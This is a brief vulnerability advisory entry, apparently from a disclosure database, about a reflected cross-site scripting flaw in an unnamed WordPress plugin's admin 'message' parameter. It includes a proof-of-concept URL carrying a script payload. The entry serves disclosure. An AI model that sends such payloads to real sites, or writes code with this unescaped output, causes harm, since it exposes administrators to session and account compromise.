EPSS
Percentile
43.2%
The plugin does not escape the message parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/index.php?sl_activation=false&message;=<script>alert(origin)<%2Fscript>